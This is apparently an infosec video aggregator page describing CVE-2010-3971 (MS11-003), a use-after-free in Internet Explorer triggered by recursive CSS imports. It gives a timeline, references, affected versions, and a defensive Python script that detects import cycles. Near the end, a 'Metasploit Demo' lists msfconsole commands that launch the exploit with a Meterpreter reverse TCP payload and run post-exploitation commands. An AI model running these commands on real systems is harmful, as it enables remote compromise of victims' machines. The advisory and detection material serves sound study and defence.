Timeline :
Vulnerability discovered the 2010-11-29 by WooYun
Vulnerability disclosed the 2010-12-08 by WooYun
Vulnerability confirmed the 2010-12-09 by VUPEN Security
Vulnerability explained the 2010-12-16 by Nephi Johnson
Exploit released the 2010-12-20 by jduck
Provided by:
WooYun
d0c_s4vage
Nephi Johnson
jduck (Metasploit Team)
Reference(s) :
OSVDB-69796
SA42510
SA 2488013
CVE-2010-3971
EDB-ID-15708
EDB-ID-15746
MS11-003
Affected versions :
For Internet Explorer 8 :
Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2, Windows 7 32, Windows 7 x64, Windows Server 2008 R2 x64
For Internet Explorer 7 :
Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2
For Internet Explorer 6 :
Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2
Tested on Windows XP SP3 with :
Internet Explorer 8 (mshtml.dll 8.0.6001.18999)
Description:
First disclosed by WooYun as a DoS vulnerability in Internet Explorer 8, this vulnerability rapidly evolved into a remote code execution vulnerability, confirmed by VUPEN Security. Nephi Johnson, from BreakingPoint Systems, explained the vulnerability and provided a first exploit, for IE8 on XP SP3, in his interesting article "When A DoS Isn't A DoS".
This Metasploit module exploits a memory corruption vulnerability within the Microsoft HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused (a use-after-free). This leads to arbitrary code execution.
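The trigger condition described above is a stylesheet reference chain that loops back on itself. As an added, defensive illustration (not code from the original post or from the Metasploit module), the Python below walks the @import and <link rel="stylesheet"> graph of a set of already-fetched documents and reports every cycle, the kind of check a content proxy or detonation sandbox could run; the example.test URLs and document bodies are constructed samples.

```python
import re
from urllib.parse import urljoin, urldefrag

# @import "x";  @import 'x';  @import url(x);  @import url("x");
IMPORT_RE = re.compile(r"""@import\s+(?:url\(\s*)?["']?([^"'()\s;]+)["']?\s*\)?""", re.IGNORECASE)
LINK_TAG_RE = re.compile(r"<link\b[^>]*>", re.IGNORECASE)


def attr(tag, name):
    """Extract one attribute value (double-, single- or un-quoted) from a tag string."""
    m = re.search(r'\b%s\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))' % name, tag, re.IGNORECASE)
    return next((g for g in m.groups() if g is not None), None) if m else None


def stylesheet_refs(doc_url, body):
    """All stylesheet URLs a document pulls in, resolved against doc_url, fragments dropped.
    The body is scanned for @import regardless of content type, because a lenient CSS
    parser will act on @import rules it finds inside a document served as HTML."""
    refs = []
    for tag in LINK_TAG_RE.findall(body):
        rel, href = attr(tag, "rel"), attr(tag, "href")
        if rel and "stylesheet" in rel.lower() and href:
            refs.append(urldefrag(urljoin(doc_url, href))[0])
    for target in IMPORT_RE.findall(body):
        refs.append(urldefrag(urljoin(doc_url, target))[0])
    return refs


def find_import_cycles(start_url, fetch):
    """Depth-first walk of the stylesheet graph; returns each cycle reachable from start_url
    as a list of URLs (first element repeated at the end). `fetch` maps URL -> body."""
    cycles, stack, done = [], [], set()

    def visit(url):
        if url in stack:                      # back edge: the chain loops onto itself
            cycles.append(stack[stack.index(url):] + [url])
            return
        if url in done or fetch.get(url) is None:
            return
        stack.append(url)
        for ref in stylesheet_refs(url, fetch[url]):
            visit(ref)
        stack.pop()
        done.add(url)

    visit(start_url)
    return cycles


# Constructed sample site: index.html links site.css, which imports itself.
SAMPLE_SITE = {
    "http://example.test/index.html": '<html><head><link rel="stylesheet" href="site.css"></head></html>',
    "http://example.test/site.css": "@import url('site.css');\nbody { color: #000; }",
    "http://example.test/clean.html": '<html><head><style>@import "theme.css";</style></head></html>',
    "http://example.test/theme.css": "body { margin: 0; }",
}
```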
Metasploit Demo :
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
ipconfig
owned !
Tags: windows, internet explorer, css, 0day, metasploit, remote code execution, microsoft
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.